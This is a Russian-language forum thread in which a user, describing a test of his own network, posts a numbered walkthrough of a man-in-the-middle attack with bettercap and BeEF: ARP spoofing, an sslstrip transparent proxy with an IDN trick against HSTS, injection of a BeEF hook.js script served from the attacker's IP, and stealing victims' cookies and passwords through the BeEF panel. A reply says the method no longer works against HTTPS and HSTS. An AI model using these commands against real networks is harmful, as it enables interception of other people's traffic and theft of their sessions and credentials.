• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

"Bettercap" + "BeEF" (проблема в процессе)

Alex Feuer

Member
14.03.2020
19
0
BIT
14
Провожу тест собственной сети, по данному мануалу: Вскрытие трафика в публичных сетях
По итогу в процессе что-то идёт не так, "arp.spoof on" и "http.proxy on" запускаются, но "BeEF" не ловит браузер целевого устройства ("hook.js" не действует?), а "Bettercap" не перехватывает трафик. Максимум что происходит, так это то что при переходе на некоторые простенькие сайты с "https" появляется сообщение что на данном сайте не все данные (изображения) зашифрованы. Привожу последовательность команд вводимых мной в терминале и пояснения к ним:

1. sudo apt-get update && apt-get upgrade -y - Обновление репозитория и установка обновлений системных приложений





2. sudo beef-xss - Запуск "BeEF" (во время запуска попросит задать новый пароль - задаём)





3. - Открыть ссылку в браузере (вход в админ-панель; логин - beef, пароль тот что задавали ранее)








Bettercap:





4. Зачастую предустановленный "Bettercap" работает некорректно, выдаёт различные ошибки, поэтому необходимо удалить его и установить заново:

sudo apt-get remove bettercap
sudo rm /usr/local/bin/bettercap
https://github.com/bettercap/bettercap/releases/download/v2.28/bettercap_linux_amd64_v2.28.zip - Скачать бинарную версию программы (для своей архитектуры ядра)

Теперь распаковать и переместить исполняемый файл в папку предназначенную для ручной установки:
cd Загрузки
unzip Название_файла.zip
sudo mv bettercap /usr/local/bin/





5. sudo bettercap -eval "caplets.update; ui.update; q" - Установка веб-интерфейса "Bettercap" (уже на этом этапе необходимо подключиться к сети "жертвы" чтобы wifi-адаптер получил IP, далее он понадобится (узнать: ip address))





6. sudo bettercap -caplet http-ui - Запуск "Bettercap" с веб-интерфейсом и модулями "api.rest" и "http.server 127.0.0.1"





7. 127.0.0.1 - Открыть ссылку в браузере (без номера порта "Bettercap") + (логин/пароль - user/pass)





8. Выполнить в терминале "Bettercap":

net.recon on - Включение модуля активного зондирования.
net.probe on - Запуск активного зондирования новых хостов в сети, через отправку фиктивных пакетов каждому возможному IP в подсети (отображает MAC-адреса + названия производителя устройств).
net.show - Вывод в окно терминала таблицы со списком устройств и размером кэша.
net.probe off - Выключение модуля активного зондирования.





9. Настройка переменных "Bettercap" чтобы:

Работал как прозрачный прокси (transparent proxy) и "отключал" шифрование браузерного обмена "жертв" модулем "sslstrip".
Внедрял им вредоносную нагрузку (http://вставь_свой_ip/hook.js - скрипт "BeEF", используй IP, выданный роутером вашему адаптеру в атакуемой сети).
Обходил механизм "HTST" методом замены адреса в адресной строке браузера жертвы на похожие (интернационализированные) символы.

Команды (в терминале "Bettercap"):
set http.proxy.sslstrip true
set http.proxy.injectjs http://вставь_свой_ip/hook.js
set http.proxy.sslstrip.useIDN true





10. Запуск атаки против пользователей сети (в терминале "Bettercap"):

arp.spoof on - Запускает отправление "ARP" кеша устройств "жертв", этот модуль перенаправляет трафик на беспроводной интерфейс "злоумышленника".

http.proxy on - Запускает прозрачный прокси, этот модуль создаёт прокси-сервер, который будет ловить весь переадресованный трафик и модифицировать его в интересах "злоумышленника". "Жертвы" начинают пользоваться интернетом, заходить на сайты, и, в случае успеха атаки, будут лишены транспортного шифрования (а значит станут доступны для прямого прослушивания любым сниффером), и будут получать себе вредоносный скрипт "BeEF" (скрипт "BeEF" выполняется в контексте домена, в чью страницу он будет внедрён, может выполнить много разных действий, например утащить "cookies" или украсть вводимые пароли).





11. Теперь при переходе на некоторые сайты в окне терминала "Bettercap" должны отбражаться сообщения о успехе, а в адресной строке браузера "жертвы" появится лишь "чёрный треугольник", означающий что соединение не зашифровано, также может появиться другой незнакомый символ. Кроме этого, во вкладке "BeEF", в контрольной панели, в разделе "Online Browsers" появится запись о новом браузере, пойманном на крючок (смотри примеры в папке).





12. Выбираем этот браузер мышью, переходим в суб-вкладку "Commands", на каталог "Browsers", потом последовательно: "Hooked domain > Get Cookie > Execute" (кража cookie-файлов, смотри пример в папке (фото #4)). И это далеко не всё что можно сделать, ведь в арсенале "BeEF" ещё несколько сотен различных команд, которые мы можем отправить пойманному браузеру: различные варианты фишинга, кража паролей, рикролы, редиректы, эксплойты...
 
Вообще, актуален ли данный тип атаки в 2023?
BEeF - мертвейший бесполезный мусор, sslstrip уже давно не работает. С https разве что можно сделать DNS spoof и то при даунгрейде соединения до http появитс предупреждение в браузере и нужно будет нажать принять риск и продолжить. Если у сайта установлен хедер HSTS, Http strict transport policy то даже кнопки принять риск и продолжить не будет. Есть ещё много протоколов и атак подверженных MITM но httpS - вряд ли.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!